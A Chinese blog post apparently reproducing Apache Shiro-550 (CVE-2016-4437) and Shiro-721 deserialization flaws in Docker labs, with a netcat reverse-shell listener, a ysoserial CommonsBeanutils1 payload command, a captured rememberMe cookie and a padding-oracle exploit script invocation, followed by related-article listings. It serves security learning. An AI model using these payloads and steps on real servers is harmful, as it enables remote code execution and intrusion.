shiro系列漏洞复现(shiro550和shiro721漏洞)

已于 2023-12-25 01:32:30 修改
阅读量785 收藏 4
点赞数 3
文章标签: 安全 java
于 2023-03-27 15:49:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53730939/article/details/129796135
版权

一:shiro550漏洞复现(cve-2016-4437)

漏洞描述

Apache Shiro 是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理等功能,Shiro框架直观、易用、同时也能提供健壮的安全性。

Apache Shiro反序列化漏洞分为两种:Shiro-550Shiro-721

Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞。 那么,Payload产生的过程: 命令=>序列化=>AES加密=>base64编码=>RememberMe Cookie值 在整个漏洞利用过程中,比较重要的是AES加密的密钥,如果没有修改默认的密钥那么就很容易就知道密钥了,Payload构造起来也是十分的简单。
 

环境搭建

启动环境

切换到/shiro/CVE-2016-4437# 目录下

docker-compose up -d

d3a717f82d5740a7bc6dbf88581f566a.png

此时环境搭建成功

7160643f1f8a400c9cfb453bd6fd38c1.png

漏洞复现

 勾选remenberMe选项,然后抓包,相应包中有rememberME字段,证明其为shiro框架

c42f67353eab4123839085b3183ffe2f.png

 

使用shiro反序列化检测工具测试

github:https://github.com/feihong-cs/ShiroExploit/releases

4cc58250f500402987609bf943475119.png

 输入url然后点击下一步

0d2af2f43f8045598c5ee1cd01d44112.png

检测到目标存在Shiro反序列化漏洞

 438739969c754f79a1d44335d1e15bea.png

 打开监听模式

反弹shell

nc -lvp 6666

8bb6c8b98ccc40a48e171b195ef40fd5.png

 cac78058dba44ffc928c9f6dff6a3941.png

 此时查看是否监听到

9f85858ca8434bbc8331b30ba3f4618a.png

 反弹shell成功

 二:shiro721漏洞复现

环境搭建

docker pull medicean/vulapps:s_shiro_1

c2b5feac71f148b8864aed9f06a04d14.png

 docker run -d -p8080:8080 be6

fefff5858a644f478ec1cd05fc795961.png

 此时环境搭建成功

5aa1213427c145c4ba53768b4d1e6ad8.png

漏洞复现

dd0e9fae74d44beb91ba36c9e19dbae0.png

 

点击log in

输入正确的username和password

点击remember me

抓包

51eaf864f413442a95b057b550b9b202.png

 

认证失败时会设置 deleteMe 的 cookie

rememberMe=szoAhLDzPjZhooRSblDquHLMGkUP74G3V6R0yREvaGgLHDBGg2xUnTiqDSUAxMvnPDcgl0TcavUdZmHXxaPXtDAX2perdj8D9v2gLhm+ZK6ymkYD6ptgeOPFcra5h4p05Mb2/q03HmMaNWJUVCv7FuZOXdkW9ygXymNsp+sk33EVPeHhRbCWqRAojiSwP52EpAVZ0RAySavrq+IWmRzIw3ERcfLwDrDd+oFnQBLhIHIV6nMRCMCnuDvkpHmNSLOdX39/4yJSfECl+WIVD8SnVHZD8vMQHzsL+oIrIw5R/IzaQ22dhZBsDDOAVw0HNwXsuSA1L0SoQhjWTGmmgIpFwS8FCUks9xS22EC458yLsVlqXp1NtxSvWhSrNmQhQKoU+JdZTbJq38a41zZcvMy4Fa420E/xyrnD5FE4rA03bPgLFLFUniko3Tvm5uY4l9hcyR797DRz62fsuoOgGXzb2IkYAzAbnk035iiYuR1okO7XT5GNCgUXgelgdCe6D5Fo

使用ysoserial工具生成payload

fc3996666d4640859a0511431e3cd1c7.png

 

在下载路径上cmd打开
java -jar ysoserial.jar CommonsBeanutils1 "touch
 /usr/local/tomcat/test" > payload.class

#"touch
 /usr/local/tomcat/test" 在/usr/local/tomcat目录写入test

4bb3b02578dc428391917fded00fce49.png

 6a876668d839460198f3d2bf35f0f100.png

cp payload.class  shiro_rce_exp-master

 75132b84d94a458da587d4cb8d601c7c.png

 cd shiro_rce_exp-master   切换到脚本目录

 7436124e922c49c0b1809d70cb62cb1c.png

python2 shiro_exp.py http://192.168.8.208:8181/account/  之前获取的RememberMe值   payload.class

这里用python2启动脚本

206c99b620004b2c9a36f0e58125078e.png

 接下来就是漫长的等待~

72777692b42b452fbc21694121b6b2aa.png

7cf529e826224976a6a018d23e0ad936.png

 将扫出来的cookies替换之前的

9660735ddd144a3c98f14bf7c0a4a563.png

检查一下执行结果,可以看到成功创建了一个test文件

f2ea6f4140a84aa39f4bd7118ec57f5d.png

 

 

 

 

 

 

hh_y
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Shiro反序列化漏洞(Shiro-550Shiro-721)
做自己喜欢的事,并将其发挥到极致!
12-21 6748
0x01 Shiro介绍 Apache Shiro 是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理等功能,Shiro框架直观、易用、同时也能提供健壮的安全性。 Apache Shiro反序列化漏洞分为两种:Shiro-550Shiro-721 0x02 Shiro-550 反序列化漏洞 CVE-2016-4437 漏洞原理 Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的Cookie,在服务端对rememberMe的Cook
ShiroExploit-Deprecated:Shiro550Shiro721一键化利用工具,支持多种回显方式
03-21
2019.11.9更新: 由于当初作者开发时能力有限,导致工具本身存在着重重和问题矛盾等多重矛盾。目前有很多其他的优秀工具提供了对shiro检测/利用更好的支持(如更好的回显支持,更有效的小工具与直接支持内存外壳等),此工具当前已相形见绌。请各位移步其他更优秀的项目,感谢各位的使用。 2019.9.20更新: 对回显方式进行了一次更新,希望现在能好用一点 2020.9.12更新: 很多回显方式在本地测试OK,但是在实际环境中却不行,这个问题我不知道该怎么解决,希望有师傅可以指导下或者一起讨论下。 ShiroExploit 支持对Shiro550(硬编码秘钥)和Shiro721(Padding Oracle)的一键化检测,支持多种回显方式 使用说明 初步:按要求输入要检测的目标URL和选择突破类型 Shiro550提供rememberMe Cookie, Shiro721需要提供一个有
【渗透测试】Apache Shiro系列漏洞
weixin_53972936的博客
11-01 3480
Apache Shiro框架是一个功能强大且易于使用的 Java 安全框架,它执行身份验证、授权、加密和会话管理。借助 Shiro 易于理解的 API,您可以快速轻松地保护任何应用程序——从最小的移动应用程序到最大的 Web 和企业应用程序。
shiro反序列化漏洞
最新发布
g1345444的博客
02-26 941
查看到这里发现会传入前面序列化的数组和key值,最后再去调用他的重载方法并且传入序列化数组、key、ivBytes值、generate。这里调用crypt方法进行获取到加密后的数据,而这个output是一个byte数组,大小是加密后数据的长度加上iv这个值的长度。进行加密,该类中也有对应的解密操作。该方法的作用为使用Base64对指定的序列化字节数组进行编码,并将Base64编码的字符串设置为cookie值。这里执行完成后就拿到了ivBytes的值了,这里再回到加密方法的地方查看具体加密的实现。
[Vulhub] Apache Shiro 反序列化漏洞shiro-550shiro-721
weixin_45605352的博客
05-15 2341
0x00 漏洞描述 Apache Shiro是一款开源强大且易用的Java安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。 Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。 0x01 影响版本 Apache Shiro <= 1.2.4 漏洞特征: shiro反序列
ShiroExp-1.3.1-all.jar shiro反序列化检测工具
01-12
ShiroExp-1.3.1-all.jar shiro反序列化检测工具 我这里是用于搭建攻防演练演示环境用
Shiro框架漏洞分析与复现
未完成的歌~的博客
05-15 3808
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性,可以快速轻松地保护任何应用程序——从最小的移动应用程序到最大的 Web 和企业应用程序。
详细shiro漏洞复现及利用方法(CVE-2016-4437)
热门推荐
dreamthe的博客
04-26 2万+
该篇文章比较详细的介绍shiro漏洞利用,无论是shiro漏洞图形化工具利用,还是shiro漏洞结合JRMP我觉得比大多数文章都详细,如果你对网上结合JRMP反弹shell不是很明白,非常推荐来看看这篇文章。另外漏洞利用工程中用到的工具以及代码都上传到百度网盘,供大家使用,在文章最后哦。
shiro-721反序列化漏洞复现
weixin_63960760的博客
08-22 677
密码分组链接模式(Cipher Block Chaining,CBC),其中“分组"是指加密和解密过程都是以分组进行的。每一个分组大小为128bits(16字节),如果明文的长度不是16字节的整数倍,需要对最后一个分组进行填充(padding),使得最后一个分组长度为16字节。"链接”是指密文分组像链条一样相互连接在一起。
JAVA安全之Shrio550-721漏洞原理及复现
shelter1234567的博客
11-16 1408
关于shrio漏洞,网上有很多博文讲解,这些博文对漏洞的解释似乎有一套约定俗成的说辞,让人云里来云里去,都没有对漏洞产生的原因深入地去探究.....本文从现象到本质,旨在解释清楚Shrio漏洞是怎么回事!550721到底有什么区别!两者利用前提到底是什么?(有别于网络上的解释,如有错误还望大佬及时指正)
shiro漏洞检测工具
08-10
shiro漏洞检测工具,找了一个18M左右的不好用,经验证这个好用,不会报找不到类错误。
Shiro反序列化漏洞Shiro版本升级资源
06-22
shiro使用的版本是1.2.4,存在反序列化漏洞,我们采取的办法是手动升级到了1.2.6版本,但苦于无法验证是否解决了问题,后来发现了一款测试工具,ShiroExploit。 测试工具下载地址 ... 反序列化漏洞是如何产生的?...
shiro远程命令执行漏洞检测工具.zip
11-15
shiro远程命令执行漏洞检测工具:包括了shiro_attack_2.2和ShiroExploit.V2.51,大家可根据需要自行下载
CVE-2016-4437 Shiro550 & Shiro721 RememberMe Padding Oracle 漏洞利用
03-29
CVE-2016-4437 Shiro550 & Shiro721 RememberMe Padding Oracle Shiro721 RememberMe Padding Oracle影响版本: - Apache Shiro 1.2.5,1.2.6,1.3.0,1.3.1,1.3.2,1.4.0-RC2,1.4.0,1.4.1 CVE-2016-4437 ...
Shiro 550721漏洞的不同
一醉一休的博客
03-08 9618
利用难度区别、版本区别
Shiro-721反序列化漏洞
一醉一休的博客
10-19 5413
Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序,用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞Shiro的反序列化漏洞Shiro-550Shiro-721
shiro 721 反序列化漏洞复现与原理以及Padding Oracle Attack攻击加解密原理
Shanfenglan's blog
11-14 1万+
文章目录利用条件shiro550shiro721环境搭建漏洞复现 利用条件 shiro550 知道key且目标服务器含有可利用的攻击链 影响版本:1.2.4以下 shiro721 知道已经登陆用户的合法cookie,利用padding orcale 加密生成恶意rememberme的值进行利用 影响版本: 1.2.5, 1.2.6, 1.3.0, 1.3.1, 1.3.2, 1.4.0-RC2, 1.4.0, 1.4.1 环境搭建 git clone https://github.com/inspiri
shiro721漏洞检查工具
12-28
shiro721漏洞检查工具是一款专门用于检测网络安全漏洞的软件。它可以帮助用户发现网络系统中存在的各种漏洞安全隐患,从而提前预防可能的安全风险。该工具具有扫描快速、全面性强的特点,可以有效地发现系统中的各种潜在漏洞,包括但不限于密码弱口令、未授权访问、系统配置错误等。 shiro721漏洞检查工具通过对网络系统进行扫描和分析,能够主动地发现并报告系统中的潜在安全问题,为用户提供及时的漏洞修复建议。同时,它还可以帮助用户对系统进行安全性评估和风险分析,为用户提供全面的安全防护方案。 该工具操作简单,界面友好,用户无需专业安全知识也能轻松上手。它还支持定时自动扫描功能,可以帮助用户定期对系统进行漏洞检查,保障系统安全。 总之,shiro721漏洞检查工具是一款功能强大、操作简便、安全可靠的网络安全工具,可以帮助用户提高网络系统的安全性,预防潜在的安全风险,是网络安全管理的得力助手。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值